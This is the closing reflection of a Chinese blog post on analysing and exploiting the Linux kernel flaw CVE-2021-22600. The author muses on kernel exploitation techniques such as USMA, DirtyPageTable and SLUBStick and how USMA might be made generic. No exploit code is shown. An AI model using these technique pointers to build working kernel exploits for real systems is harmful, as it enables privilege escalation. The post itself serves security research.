“我们好像过快地爬到了山顶,以至于突然变得无事可做。” 于是在各种高级内核利用技巧井喷式爆发的 2021 ~ 2023 年结束之后, 我们会发现 2024 这一年好像没有什么新的东西能玩了 ,这一年的各大家似乎都在沉寂当中( 当然笔者也什么都没发是因为笔者本来就菜嗷 ),大家好像没有什么值得拿出来修的花活了,这一年明面上的产出似乎只有一些新瓶装旧酒的论文和剽窃抄袭洗稿之物, 在 kernel exploitation 上咱们好像看不到什么本质上新的东西了也可能是笔者见识短浅,谁知道呢 ),大家能做的似乎就只是再翻一翻还有没有埋藏在沙子当中没被发现的珍珠(内核结构体),以及感叹物资的损坏如此之快(逝去的 io_uring 的 4k 菜单堆)

——当然,以 2025 年的眼光重新审视当年淳朴的 USMA,我们会发现和笔者在第一份 exp 当中给出的成熟的现代内核攻击技术相比,强依赖于特定内核镜像的 USMA 似乎并不是一个多么 powerful 的技术,但不得不说的是 在 2022 年的时候这确乎是一个非常亮眼的技术 ,毕竟在此之前没有人曾经想过页面映射机制也能够拿来做如此精妙的攻击,而这也为后面出现的 DirtyPageTable 以及 SLUBStick 等技术提供了指导

而 USMA 又一定要依赖于特定的内核镜像吗?答案似乎也并非如此,通过各种内核对象各种内核函数表,我们可以泄漏出名字和功能已知的内核函数的地址,这无关于内核镜像的内部构造,再配上合适的参数列表与特定构造的 shellcode, 我们其实是有办法将 USMA 转换为通用攻击方法的 ——感兴趣的读者欢迎品尝 由 veritas501 师傅给大家带来的大餐

2018 年的我们还在吃力地用各种内核对象拼凑返回导向编程,而 2023 年的我们已经全面转向泛用性与稳定性高质量发展的现代内核利用技巧,而这 离不开所有安全研究员们的共同努力 ,纵使现在进入了短暂的沉寂期,但笔者相信总会有拔云见日的那一天

懒得写了,摆烂!


【CVE.0x0D】CVE-2021-22600 漏洞分析及利用
https://arttnba3.github.io/2025/04/30/CVE-0X0D-CVE-2021-22600/
作者
arttnba3
发布于
2025年4月30日
许可协议